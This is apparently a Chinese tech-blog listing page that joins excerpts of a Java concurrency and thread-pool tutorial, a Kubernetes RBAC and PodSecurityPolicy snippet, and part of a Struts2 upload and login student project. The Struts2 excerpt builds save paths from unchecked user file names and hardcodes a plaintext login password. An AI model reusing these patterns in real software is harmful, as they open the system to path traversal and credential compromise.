//容量为0public static void main(String[] args) throws InterruptedException {BlockingQueue<String> strs = new SynchronousQueue<>();new Thread(()->{//这个线程就是消费者,来取值try {System.out.println(strs.take());//和同步队列要值} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.put("aaa"); //阻塞等待消费者消费,就拿着aaa站着,等线程来取//strs.put("bbb");//strs.add("aaa");System.out.println(strs.size());} } 9、特殊的阻塞队列4:TransferQueue 传递队列 此队列加入了一个方法transfer()用来向队列添加元素 但是和put()方法不同的是,put添加完元素就走了 而这个方法,添加完自己就阻塞了,直到有人将这个元素取走,它才继续工作(省去我们手动阻塞) import java.util.concurrent.LinkedTransferQueue;public class T09_TransferQueue {public static void main(String[] args) throws InterruptedException {LinkedTransferQueue<String> strs = new LinkedTransferQueue<>();new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.transfer("aaa");//放东西到队列,同时阻塞等待消费者线程,取走元素//strs.put("aaa");//如果用put就和普通队列一样,放完东西就走了/new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();/} } 3、线程池 线程池 由于单独创建线程,十分影响效率,而且无法对线程集中管理,一旦疏落,可能线程无限执行,浪费资源 线程池就是一个存储线程的游泳池,而每个线程就是池子里面的赛道 池子里的线程不执行任何任务,只是提供一个资源 而谁提交了任务,比如我想来游泳,那么池子就给你一个赛道,让你游泳 比如它想练憋气,那么给它一个赛道练憋气 当他们用完,走了,那么后面其它人再过来继续用 这就是线程池,始终只有这几个线程,不做实现,而是借用这几个线程的用户,自己掌控用这些线程资源做什么(提交任务给线程,线程空闲就帮他们完成任务) 线程池的两种类型(两类,不是两个) ThreadPoolExecutor(简称TPE) ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 1、常用类 Executor ExecutorService 扩展了execute方法,具有一个返回值 规定了异步执行机制,提供了一些执行器方法,比如shutdown()关闭等 但是它不知道执行器中的线程何时执行完 Callable 对Runnable进行了扩展,实现Callable的调用,可以有返回值,表示线程的状态 但是无法返回线程执行结果 Future 获得未来线程执行结果 由此,我们可以得知线程池基本的一个使用步骤 其中service.submit():为异步提交,也就是说,主线程该干嘛干嘛,我是异步执行的,和同步不一样(当前线程执行完,主线程才能继续执行,叫同步) futuer.get():获取结果集结果,此时因为异步,主线程执行到这里,结果集可能还没封装好,所以此时如果没有值,就阻塞,直到结果集出来 public static void main(String[] args) throws ExecutionException, InterruptedException {Callable<String> c = new Callable() {@Overridepublic String call() throws Exception {return "Hello Callable";} };ExecutorService service = Executors.newCachedThreadPool();Future<String> future = service.submit(c); //异步System.out.println(future.get());//阻塞service.shutdown();} 2、FutureTask 可充当任务的结果集 上面我们介绍Future是用来得到任务的执行结果的 而FutureTask,可以当做一个任务用,并且返回任务的结果,也就是可以跑线程,然后还可以得到线程结果 public static void main(String[] args) throws InterruptedException, ExecutionException {FutureTask<Integer> task = new FutureTask<>(()->{TimeUnit.MILLISECONDS.sleep(500);return 1000;}); //new Callable () { Integer call();}new Thread(task).start();System.out.println(task.get()); //阻塞} 3、CompletableFuture 非常灵活的任务结果集 一个非常灵活的结果集 他可以将很多执行不同任务的线程的结果进行汇总 比如一个网站,它可以启动多个线程去各大电商网站,比如淘宝,京东,收集某些或某一个商品的价格 最后,将获取的数据进行整合封装 最终,客户就可以通过此网站,获取某类商品在各网站的价格信息 / 假设你能够提供一个服务 这个服务查询各大电商网站同一类产品的价格并汇总展示 @author 马士兵 http://mashibing.com/import java.io.IOException;import java.util.Random;import java.util.concurrent.CompletableFuture;import java.util.concurrent.ExecutionException;import java.util.concurrent.TimeUnit;public class T06_01_CompletableFuture {public static void main(String[] args) throws ExecutionException, InterruptedException {long start, end;/start = System.currentTimeMillis();priceOfTM();priceOfTB();priceOfJD();end = System.currentTimeMillis();System.out.println("use serial method call! " + (end - start));/start = System.currentTimeMillis();CompletableFuture<Double> futureTM = CompletableFuture.supplyAsync(()->priceOfTM());CompletableFuture<Double> futureTB = CompletableFuture.supplyAsync(()->priceOfTB());CompletableFuture<Double> futureJD = CompletableFuture.supplyAsync(()->priceOfJD());CompletableFuture.allOf(futureTM, futureTB, futureJD).join();//当所有结果集都获取到,才汇总阻塞CompletableFuture.supplyAsync(()->priceOfTM()).thenApply(String::valueOf).thenApply(str-> "price " + str).thenAccept(System.out::println);end = System.currentTimeMillis();System.out.println("use completable future! " + (end - start));try {System.in.read();} catch (IOException e) {e.printStackTrace();} }private static double priceOfTM() {delay();return 1.00;}private static double priceOfTB() {delay();return 2.00;}private static double priceOfJD() {delay();return 3.00;}/private static double priceOfAmazon() {delay();throw new RuntimeException("product not exist!");}/private static void delay() {int time = new Random().nextInt(500);try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.printf("After %s sleep!\n", time);} } 4、TPE型线程池1:ThreadPoolExecutor 原理及其参数 线程池由两个集合组成,一个集合存储线程,一个集合存储任务 存储线程:可以规定大小,最多可以有多少个,以及指定核心线程数量(不会被回收) 任务队列:存储任务 细节:初始线程池没有线程,当有一个任务来,线程池起一个线程,又有一个任务来,再起一个线程,直到达到核心线程数量 核心线程数量达到时,新来的任务将存储到任务队列中等待核心线程处理完成,直到任务队列也满了 当任务队列满了,此时再次启动一个线程(非核心线程,一旦空闲,达到指定时间将会消失),直到达到线程最大数量 当线程容器和任务容器都满了,又来了线程,将会执行拒绝策略 上面的细节涉及的所有步骤内容,均由创建线程池的参数执行 下面是ThreadPoolExecutor构造方法参数的源码注释 / 用给定的初始值,创建一个新的线程池 @param corePoolSize 核心线程数量 @param maximumPoolSize 最大线程数量 @param keepAliveTime 当线程数大于核心线程数量时,空闲的线程可生存的时间 @param unit 时间单位 @param workQueue 任务队列,只能包含由execute提交的Runnable任务 @param threadFactory 工厂,用于创建线程给线程池调度的工厂,可以自定义 @param handler 拒绝策略(可以自定义,JDK默认提供4种),当线程边界和队列容量已经满了,新来线程被阻塞时使用的处理程序/public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) JDK提供的4种拒绝策略,不常用,一般都是自己定义拒绝策略 Abort:抛异常 Discard:扔掉,不抛异常 DiscardOldest:扔掉排队时间最久的(将队列中排队时间最久的扔掉,然后让新来的进来) CallerRuns:调用者处理任务(谁通过execute方法提交任务,谁处理) ThreadPoolExecutor继承关系 继承关系:ThreadPoolExecutor->AbstractExectorService类->ExectorService接口->Exector接口 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面创建线程池,哪里用到了它 使用实例 import java.io.IOException;import java.util.concurrent.;public class T05_00_HelloThreadPool {static class Task implements Runnable {private int i;public Task(int i) {this.i = i;}@Overridepublic void run() {System.out.println(Thread.currentThread().getName() + " Task " + i);try {System.in.read();} catch (IOException e) {e.printStackTrace();} }@Overridepublic String toString() {return "Task{" +"i=" + i +'}';} }public static void main(String[] args) {ThreadPoolExecutor tpe = new ThreadPoolExecutor(2, 4,60, TimeUnit.SECONDS,new ArrayBlockingQueue<Runnable>(4),Executors.defaultThreadFactory(),new ThreadPoolExecutor.CallerRunsPolicy());//创建线程池,核心2个,最大4个,空闲线程存活时间60s,任务队列容量4,使用默认线程工程,创建线程。拒绝策略是JDK提供的for (int i = 0; i < 8; i++) {tpe.execute(new Task(i));//供提交8次任务}System.out.println(tpe.getQueue());//查看任务队列tpe.execute(new Task(100));//提交新的任务System.out.println(tpe.getQueue());tpe.shutdown();//关闭线程池} } 5、TPE型线程池2:SingleThreadPool 单例线程池(只有一个线程) 为什么有单例线程池 有任务队列,有线程池管理机制 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面哪里用到了它 /创建单例线程池,扔5个任务进去,查看输出结果,看看有几个线程执行任务/import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();for(int i=0; i<5; i++) {final int j = i;service.execute(()->{System.out.println(j + " " + Thread.currentThread().getName());});} }} 6、TPE型线程池3:CachedPool 缓存,存储线程池 此线程池没有核心线程,来一个任务启动一个线程(最多Integer.MaxValue,不会放在任务队列,因为任务队列容量为0),每个线程空闲后,只能活60s 实例 import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();//通过Executors获取池子for(int i=0; i<5; i++) {final int j = i;service.execute(()->{//提交任务System.out.println(j + " " + Thread.currentThread().getName());});}service.shutdown();} } 7、TPE型线程池4:FixedThreadPool 固定线程池 此线次池,用于创建一个固定线程数量的线程池,不会回收 实例 import java.util.ArrayList;import java.util.List;import java.util.concurrent.Callable;import java.util.concurrent.ExecutionException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.Future;public class T09_FixedThreadPool {public static void main(String[] args) throws InterruptedException, ExecutionException {//并发执行long start = System.currentTimeMillis();getPrime(1, 200000); long end = System.currentTimeMillis();System.out.println(end - start);//输出并发执行耗费时间final int cpuCoreNum = 4;//并行执行ExecutorService service = Executors.newFixedThreadPool(cpuCoreNum);MyTask t1 = new MyTask(1, 80000); //1-5 5-10 10-15 15-20MyTask t2 = new MyTask(80001, 130000);MyTask t3 = new MyTask(130001, 170000);MyTask t4 = new MyTask(170001, 200000);Future<List<Integer>> f1 = service.submit(t1);Future<List<Integer>> f2 = service.submit(t2);Future<List<Integer>> f3 = service.submit(t3);Future<List<Integer>> f4 = service.submit(t4);start = System.currentTimeMillis();f1.get();f2.get();f3.get();f4.get();end = System.currentTimeMillis();System.out.println(end - start);//输出并行耗费时间}static class MyTask implements Callable<List<Integer>> {int startPos, endPos;MyTask(int s, int e) {this.startPos = s;this.endPos = e;}@Overridepublic List<Integer> call() throws Exception {List<Integer> r = getPrime(startPos, endPos);return r;} }static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;}static List<Integer> getPrime(int start, int end) {List<Integer> results = new ArrayList<>();for(int i=start; i<=end; i++) {if(isPrime(i)) results.add(i);}return results;} } 8、TPE型线程池5:ScheduledPool 预定,延时线程池 根据延时时间(隔多长时间后运行),排序,哪个线程先执行,用户只需要指定核心线程数量 此线程池返回的池对象,和提交任务方法都不一样,比较涉及到时间 import java.util.Random;import java.util.concurrent.Executors;import java.util.concurrent.ScheduledExecutorService;import java.util.concurrent.TimeUnit;public class T10_ScheduledPool {public static void main(String[] args) {ScheduledExecutorService service = Executors.newScheduledThreadPool(4);service.scheduleAtFixedRate(()->{//提交延时任务try {TimeUnit.MILLISECONDS.sleep(new Random().nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();}System.out.println(Thread.currentThread().getName());}, 0, 500, TimeUnit.MILLISECONDS);//指定延时时间和单位,第一个任务延时0毫秒,之后的任务,延时500毫秒} } 9、手写拒绝策略小例子 import java.util.concurrent.;public class T14_MyRejectedHandler {public static void main(String[] args) {ExecutorService service = new ThreadPoolExecutor(4, 4,0, TimeUnit.SECONDS, new ArrayBlockingQueue<>(6),Executors.defaultThreadFactory(),new MyHandler());//将手写拒绝策略传入}static class MyHandler implements RejectedExecutionHandler {//1、继承RejectedExecutionHandler@Overridepublic void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {//2、重写方法//log("r rejected")//伪代码,表示通过log4j.log()报一下日志,拒绝的时间,线程名//save r kafka mysql redis//可以尝试保存队列//try 3 times //可以尝试几次,比如3次,重新去抢队列,3次还不行就丢弃if(executor.getQueue().size() < 10000) {//尝试条件,如果size>10000了,就执行拒绝策略//try put again();//如果小于10000,尝试将其放到队列中} }} } 10、ForkJoinPool线程池1:ForkJoinPool 前面我们讲过线程分为两大类,TPE和FJP ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) 适合将大任务切分成多个小任务运行 两个方法,fork():分子任务,将子任务分配到线程池中 join():当前任务的计算结果,如果有子任务,等子任务结果返回后再汇总 下面实例实现,一百万个随机数求和,由两种方法实现,一种ForkJoinPool分任务并行,一种使用单线程做 import java.io.IOException;import java.util.Arrays;import java.util.Random;import java.util.concurrent.ForkJoinPool;import java.util.concurrent.RecursiveAction;import java.util.concurrent.RecursiveTask;public class T12_ForkJoinPool {//1000000个随机数求和static int[] nums = new int[1000000];//一堆数static final int MAX_NUM = 50000;//分任务时,每个任务的操作量不能多于50000个,否则就继续细分static Random r = new Random();//使用随机数将数组初始化static {for(int i=0; i<nums.length; i++) {nums[i] = r.nextInt(100);}System.out.println("---" + Arrays.stream(nums).sum()); //stream api 单线程就这么做,一个一个加}//分任务,需要继承,可以继承RecursiveAction(不需要返回值,一般用在不需要返回值的场景)或//RecursiveTask(需要返回值,我们用这个,因为我们需要最后获取求和结果)两个更好实现的类,//他俩继承与ForkJoinTaskstatic class AddTaskRet extends RecursiveTask<Long> {private static final long serialVersionUID = 1L;int start, end;AddTaskRet(int s, int e) {start = s;end = e;}@Overrideprotected Long compute() {if(end-start <= MAX_NUM) {//如果任务操作数小于规定的最大操作数,就进行运算,long sum = 0L;for(int i=start; i<end; i++) sum += nums[i];return sum;//返回结果} //如果分配的操作数大于规定,就继续细分(简单的重中点分,两半)int middle = start + (end-start)/2;//获取中间值AddTaskRet subTask1 = new AddTaskRet(start, middle);//传入起始值和中间值,表示一个子任务AddTaskRet subTask2 = new AddTaskRet(middle, end);//中间值和结尾值,表示一个子任务subTask1.fork();//分任务subTask2.fork();//分任务return subTask1.join() + subTask2.join();//最后返回结果汇总} }public static void main(String[] args) throws IOException {/ForkJoinPool fjp = new ForkJoinPool();AddTask task = new AddTask(0, nums.length);fjp.execute(task);/ForkJoinPool fjp = new ForkJoinPool();//创建线程池AddTaskRet task = new AddTaskRet(0, nums.length);//创建任务fjp.execute(task);//传入任务long result = task.join();//返回汇总结果System.out.println(result);//System.in.read();} } 11、ForkJoinPool线程池2:WorkStealingPool 任务偷取线程池 原来的线程池,都是有一个任务队列,而这个不同,它给每个线程都分配了一个任务队列 当某一个线程的任务队列没有任务,并且自己空闲,它就去其它线程的任务队列中偷任务,所以叫任务偷取线程池 细节:当线程自己从自己的任务队列拿任务时,不需要加锁,但是偷任务时,因为有两个线程,可能发生同步问题,需要加锁 此线程继承FJP 实例 import java.io.IOException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.TimeUnit;public class T11_WorkStealingPool {public static void main(String[] args) throws IOException {ExecutorService service = Executors.newWorkStealingPool();System.out.println(Runtime.getRuntime().availableProcessors());service.execute(new R(1000));service.execute(new R(2000));service.execute(new R(2000));service.execute(new R(2000)); //daemonservice.execute(new R(2000));//由于产生的是精灵线程(守护线程、后台线程),主线程不阻塞的话,看不到输出System.in.read(); }static class R implements Runnable {int time;R(int t) {this.time = t;}@Overridepublic void run() {try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(time + " " + Thread.currentThread().getName());} }} 12、流式API:ParallelStreamAPI 不懂的请参考:https://blog.csdn.net/grd_java/article/details/110265219 实例 import java.util.ArrayList;import java.util.List;import java.util.Random;public class T13_ParallelStreamAPI {public static void main(String[] args) {List<Integer> nums = new ArrayList<>();Random r = new Random();for(int i=0; i<10000; i++) nums.add(1000000 + r.nextInt(1000000));//System.out.println(nums);long start = System.currentTimeMillis();nums.forEach(v->isPrime(v));long end = System.currentTimeMillis();System.out.println(end - start);//使用parallel stream apistart = System.currentTimeMillis();nums.parallelStream().forEach(T13_ParallelStreamAPI::isPrime);//并行流,将任务切分成子任务执行end = System.currentTimeMillis();System.out.println(end - start);}static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;} } 13、总结 总结 Callable相当于一Runnable但是它有返回值 Future:存储执行完产生的结果 FutureTask 相当于Future+Runnable,既可以执行任务,又能获取任务执行的Future结果 CompletableFuture 可以多任务异步,并对多任务控制,整合任务结果,细化完美,比如可以一个任务完成就可以整合结果,也可以所有任务完成才整合结果 4、ThreadPoolExecutor源码解析 依然只讲重点,实际还需要大家按照上篇博客中看源码的方式来看 1、常用变量的解释 // 1. ctl,可以看做一个int类型的数字,高3位表示线程池状态,低29位表示worker数量private final AtomicInteger ctl = new AtomicInteger(ctlOf(RUNNING, 0));// 2. COUNT_BITS,Integer.SIZE为32,所以COUNT_BITS为29private static final int COUNT_BITS = Integer.SIZE - 3;// 3. CAPACITY,线程池允许的最大线程数。1左移29位,然后减1,即为 2^29 - 1private static final int CAPACITY = (1 << COUNT_BITS) - 1;// runState is stored in the high-order bits// 4. 线程池有5种状态,按大小排序如下:RUNNING < SHUTDOWN < STOP < TIDYING < TERMINATEDprivate static final int RUNNING = -1 << COUNT_BITS;private static final int SHUTDOWN = 0 << COUNT_BITS;private static final int STOP = 1 << COUNT_BITS;private static final int TIDYING = 2 << COUNT_BITS;private static final int TERMINATED = 3 << COUNT_BITS;// Packing and unpacking ctl// 5. runStateOf(),获取线程池状态,通过按位与操作,低29位将全部变成0private static int runStateOf(int c) { return c & ~CAPACITY; }// 6. workerCountOf(),获取线程池worker数量,通过按位与操作,高3位将全部变成0private static int workerCountOf(int c) { return c & CAPACITY; }// 7. ctlOf(),根据线程池状态和线程池worker数量,生成ctl值private static int ctlOf(int rs, int wc) { return rs | wc; }/ Bit field accessors that don't require unpacking ctl. These depend on the bit layout and on workerCount being never negative./// 8. runStateLessThan(),线程池状态小于xxprivate static boolean runStateLessThan(int c, int s) {return c < s;}// 9. runStateAtLeast(),线程池状态大于等于xxprivate static boolean runStateAtLeast(int c, int s) {return c >= s;} 2、构造方法 public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) {// 基本类型参数校验if (corePoolSize < 0 ||maximumPoolSize <= 0 ||maximumPoolSize < corePoolSize ||keepAliveTime < 0)throw new IllegalArgumentException();// 空指针校验if (workQueue == null || threadFactory == null || handler == null)throw new NullPointerException();this.corePoolSize = corePoolSize;this.maximumPoolSize = maximumPoolSize;this.workQueue = workQueue;// 根据传入参数unit和keepAliveTime,将存活时间转换为纳秒存到变量keepAliveTime 中this.keepAliveTime = unit.toNanos(keepAliveTime);this.threadFactory = threadFactory;this.handler = handler;} 3、提交执行task的过程 public void execute(Runnable command) {if (command == null)throw new NullPointerException();/ Proceed in 3 steps: 1. If fewer than corePoolSize threads are running, try to start a new thread with the given command as its first task. The call to addWorker atomically checks runState and workerCount, and so prevents false alarms that would add threads when it shouldn't, by returning false. 2. If a task can be successfully queued, then we still need to double-check whether we should have added a thread (because existing ones died since last checking) or that the pool shut down since entry into this method. So we recheck state and if necessary roll back the enqueuing if stopped, or start a new thread if there are none. 3. If we cannot queue task, then we try to add a new thread. If it fails, we know we are shut down or saturated and so reject the task./int c = ctl.get();// worker数量比核心线程数小,直接创建worker执行任务if (workerCountOf(c) < corePoolSize) {if (addWorker(command, true))return;c = ctl.get();}// worker数量超过核心线程数,任务直接进入队列if (isRunning(c) && workQueue.offer(command)) {int recheck = ctl.get();// 线程池状态不是RUNNING状态,说明执行过shutdown命令,需要对新加入的任务执行reject()操作。// 这儿为什么需要recheck,是因为任务入队列前后,线程池的状态可能会发生变化。if (! isRunning(recheck) && remove(command))reject(command);// 这儿为什么需要判断0值,主要是在线程池构造方法中,核心线程数允许为0else if (workerCountOf(recheck) == 0)addWorker(null, false);}// 如果线程池不是运行状态,或者任务进入队列失败,则尝试创建worker执行任务。// 这儿有3点需要注意:// 1. 线程池不是运行状态时,addWorker内部会判断线程池状态// 2. addWorker第2个参数表示是否创建核心线程// 3. addWorker返回false,则说明任务执行失败,需要执行reject操作else if (!addWorker(command, false))reject(command);} 4、addworker源码解析 private boolean addWorker(Runnable firstTask, boolean core) {retry:// 外层自旋for (;;) {int c = ctl.get();int rs = runStateOf(c);// 这个条件写得比较难懂,我对其进行了调整,和下面的条件等价// (rs > SHUTDOWN) || // (rs == SHUTDOWN && firstTask != null) || // (rs == SHUTDOWN && workQueue.isEmpty())// 1. 线程池状态大于SHUTDOWN时,直接返回false// 2. 线程池状态等于SHUTDOWN,且firstTask不为null,直接返回false// 3. 线程池状态等于SHUTDOWN,且队列为空,直接返回false// Check if queue empty only if necessary.if (rs >= SHUTDOWN &&! (rs == SHUTDOWN &&firstTask == null &&! workQueue.isEmpty()))return false;// 内层自旋for (;;) {int wc = workerCountOf(c);// worker数量超过容量,直接返回falseif (wc >= CAPACITY ||wc >= (core ? corePoolSize : maximumPoolSize))return false;// 使用CAS的方式增加worker数量。// 若增加成功,则直接跳出外层循环进入到第二部分if (compareAndIncrementWorkerCount(c))break retry;c = ctl.get(); // Re-read ctl// 线程池状态发生变化,对外层循环进行自旋if (runStateOf(c) != rs)continue retry;// 其他情况,直接内层循环进行自旋即可// else CAS failed due to workerCount change; retry inner loop} }boolean workerStarted = false;boolean workerAdded = false;Worker w = null;try {w = new Worker(firstTask);final Thread t = w.thread;if (t != null) {final ReentrantLock mainLock = this.mainLock;// worker的添加必须是串行的,因此需要加锁mainLock.lock();try {// Recheck while holding lock.// Back out on ThreadFactory failure or if// shut down before lock acquired.// 这儿需要重新检查线程池状态int rs = runStateOf(ctl.get());if (rs < SHUTDOWN ||(rs == SHUTDOWN && firstTask == null)) {// worker已经调用过了start()方法,则不再创建workerif (t.isAlive()) // precheck that t is startablethrow new IllegalThreadStateException();// worker创建并添加到workers成功workers.add(w);// 更新largestPoolSize变量int s = workers.size();if (s > largestPoolSize)largestPoolSize = s;workerAdded = true;} } finally {mainLock.unlock();}// 启动worker线程if (workerAdded) {t.start();workerStarted = true;} }} finally {// worker线程启动失败,说明线程池状态发生了变化(关闭操作被执行),需要进行shutdown相关操作if (! workerStarted)addWorkerFailed(w);}return workerStarted;} 5、线程池worker任务单元 private final class Workerextends AbstractQueuedSynchronizerimplements Runnable{/ This class will never be serialized, but we provide a serialVersionUID to suppress a javac warning./private static final long serialVersionUID = 6138294804551838833L;/ Thread this worker is running in. Null if factory fails. /final Thread thread;/ Initial task to run. Possibly null. /Runnable firstTask;/ Per-thread task counter /volatile long completedTasks;/ Creates with given first task and thread from ThreadFactory. @param firstTask the first task (null if none)/Worker(Runnable firstTask) {setState(-1); // inhibit interrupts until runWorkerthis.firstTask = firstTask;// 这儿是Worker的关键所在,使用了线程工厂创建了一个线程。传入的参数为当前workerthis.thread = getThreadFactory().newThread(this);}/ Delegates main run loop to outer runWorker /public void run() {runWorker(this);}// 省略代码...} 6、核心线程执行逻辑-runworker final void runWorker(Worker w) {Thread wt = Thread.currentThread();Runnable task = w.firstTask;w.firstTask = null;// 调用unlock()是为了让外部可以中断w.unlock(); // allow interrupts// 这个变量用于判断是否进入过自旋(while循环)boolean completedAbruptly = true;try {// 这儿是自旋// 1. 如果firstTask不为null,则执行firstTask;// 2. 如果firstTask为null,则调用getTask()从队列获取任务。// 3. 阻塞队列的特性就是:当队列为空时,当前线程会被阻塞等待while (task != null || (task = getTask()) != null) {// 这儿对worker进行加锁,是为了达到下面的目的// 1. 降低锁范围,提升性能// 2. 保证每个worker执行的任务是串行的w.lock();// If pool is stopping, ensure thread is interrupted;// if not, ensure thread is not interrupted. This// requires a recheck in second case to deal with// shutdownNow race while clearing interrupt// 如果线程池正在停止,则对当前线程进行中断操作if ((runStateAtLeast(ctl.get(), STOP) ||(Thread.interrupted() &&runStateAtLeast(ctl.get(), STOP))) &&!wt.isInterrupted())wt.interrupt();// 执行任务,且在执行前后通过beforeExecute()和afterExecute()来扩展其功能。// 这两个方法在当前类里面为空实现。try {beforeExecute(wt, task);Throwable thrown = null;try {task.run();} catch (RuntimeException x) {thrown = x; throw x;} catch (Error x) {thrown = x; throw x;} catch (Throwable x) {thrown = x; throw new Error(x);} finally {afterExecute(task, thrown);} } finally {// 帮助gctask = null;// 已完成任务数加一 w.completedTasks++;w.unlock();} }completedAbruptly = false;} finally {// 自旋操作被退出,说明线程池正在结束processWorkerExit(w, completedAbruptly);} } 本篇文章为转载内容。原文链接:https://blog.csdn.net/grd_java/article/details/113116244。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-21 16:19:45
328
转载
Kubernetes
... "list", "update", "patch", "delete"] 然后,我们可以将这个角色绑定到某个用户或者组上: yaml apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: my-app-admin-binding subjects: - kind: User name: user1 roleRef: kind: Role name: my-app-admin apiGroup: rbac.authorization.k8s.io 2. 使用PodSecurityPolicy 除了RBAC,Kubernetes还提供了另一种称为PodSecurityPolicy(PSP)的安全策略模型,我们也可以通过它来实现更细粒度的权限控制。 例如,我们可以创建一个PSP,该PSP只允许用户创建只读存储卷的Pod: yaml apiVersion: policy/v1beta1 kind: PodSecurityPolicy metadata: name: allow-read-only-volumes spec: fsGroup: rule: RunAsAny runAsUser: rule: RunAsAny seLinux: rule: RunAsAny supplementalGroups: rule: RunAsAny volumes: - configMap - emptyDir - projected - secret - downwardAPI - hostPath allowedHostPaths: - pathPrefix: /var/run/secrets/kubernetes.io/serviceaccount type: "" 五、结论 总的来说,通过使用Kubernetes提供的RBAC和PSP等工具,我们可以有效地实现对容器的细粒度的权限控制,从而保障我们的应用的安全性和合规性。当然啦,咱们也要明白一个道理,权限控制这玩意儿虽然厉害,但它可不是什么灵丹妙药,能解决所有安全问题。咱们还得配上其他招数,比如监控啊、审计这些手段,全方位地给咱的安全防护上个“双保险”,这样才能更安心嘛。
2023-01-04 17:41:32
99
雪落无痕-t
转载文章
...atic void copy(File source,File target){ InputStream inputStream=null;OutputStream outputStream=null;try{inputStream=new BufferedInputStream(new FileInputStream(source));outputStream=new BufferedOutputStream(new FileOutputStream(target));byte[] buffer=new byte[1024];int length=0;while((length=inputStream.read(buffer))>0){outputStream.write(buffer, 0, length);} }catch(Exception e){e.printStackTrace();}finally{if(null!=inputStream){try {inputStream.close();} catch (IOException e2) {e2.printStackTrace();} }if(null!=outputStream){try{outputStream.close();}catch(Exception e2){e2.printStackTrace();} }} }@Overridepublic String execute() throws Exception { for(int i=0;i<upload.length;i++){ String path=ServletActionContext.getServletContext().getRealPath(this.getSavePath())+"\\"+this.uploadFileName[i];File target=new File(path);copy(this.upload[i],target);}return SUCCESS;} } /20171105_shiyan_upanddown/src/nuc/sw/action/LoginAction.java package nuc.sw.action;import java.util.regex.Pattern;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionSupport;public class LoginAction extends ActionSupport {//属性驱动校验private String username;private String password;public String getUsername() {return username;}public void setUsername(String username) {this.username = username;}public String getPassword() {return password;}public void setPassword(String password) {this.password = password;}//手动检验@Overridepublic void validate() {// TODO Auto-generated method stub//进行数据校验,长度6~15位 if(username.trim().length()<6||username.trim().length()>15||username==null) {this.addFieldError("username", "用户名长度不合法!");}if(password.trim().length()<6||password.trim().length()>15||password==null) {this.addFieldError("password", "密码长度不合法!");} }//登陆业务逻辑public String loginMethod() {if(username.equals("chenghaoran")&&password.equals("12345678")) {ActionContext.getContext().getSession().put("user", username);return "loginOK";}else {this.addFieldError("err","用户名或密码不正确!");return "loginFail";} }//手动校验validateXxxpublic void validateLoginMethod() {//使用正则校验if(username==null||username.trim().equals("")) {this.addFieldError("username","用户名不能为空!");}else {if(!Pattern.matches("[a-zA-Z]{6,15}", username.trim())) {this.addFieldError("username", "用户名格式错误!");} }if(password==null||password.trim().equals("")) {this.addFieldError("password","密码不能为空!");}else {if(!Pattern.matches("\\d{6,15}", password.trim())) {this.addFieldError("password", "密码格式错误!");} }} } /20171105_shiyan_upanddown/src/nuc/sw/interceptor/LoginInterceptor.java package nuc.sw.interceptor;import com.opensymphony.xwork2.Action;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionInvocation;import com.opensymphony.xwork2.ActionSupport;import com.opensymphony.xwork2.interceptor.AbstractInterceptor;public class LoginInterceptor extends AbstractInterceptor {@Overridepublic String intercept(ActionInvocation arg0) throws Exception {// TODO Auto-generated method stub//判断是否登陆,通过ActionContext访问SessionActionContext ac=arg0.getInvocationContext();String username=(String)ac.getSession().get("user");if(username!=null&&username.equals("chenghaoran")) {return arg0.invoke();//放行}else {((ActionSupport)arg0.getAction()).addActionError("请先登录!");return Action.LOGIN;} }} /20171105_shiyan_upanddown/src/struts.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.1.7//EN""http://struts.apache.org/dtds/struts-2.1.7.dtd"><struts><constant name="struts.i18n.encoding" value="utf-8"/><package name="default" extends="struts-default"><interceptors><interceptor name="login" class="nuc.sw.interceptor.LoginInterceptor"></interceptor></interceptors> <action name="docUpload" class="nuc.sw.action.DocUploadAction"><!-- 使用fileUpload拦截器 --><interceptor-ref name="fileUpload"><!-- 指定允许上传的文件大小最大为50000字节 --><param name="maximumSize">50000</param></interceptor-ref><!-- 配置默认系统拦截器栈 --><interceptor-ref name="defaultStack"/><!-- param子元素配置了DocUploadAction类中savePath属性值为/upload --><param name="savePath">/upload</param><result>/showFile.jsp</result><!-- 